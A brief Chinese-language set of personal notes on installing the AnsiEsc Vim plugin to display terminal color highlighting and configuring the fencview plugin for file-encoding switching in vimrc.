#AnsiEsc 终端高亮显示到VIM中(如ls grep等结果中的高亮)
#http://www.vim.org/scripts/script.php?script_id=4979 (新版本地址) #https://github.com/powerman/vim-plugin-AnsiEsc (github) wget http://www.vim.org/scripts/download_script.php?src_id=24019 vim AnsiEsc.vmb :so % test: ls -al /etc --color=always > /tmp/a.txt && vim /tmp/a.txt
#编码切换
#先下载fencview.vim到plugin文件夹中 #~/.vim/vimrc "关闭自动检测 let g:fencview_autodetect=0 map <F2> :FencView<cr>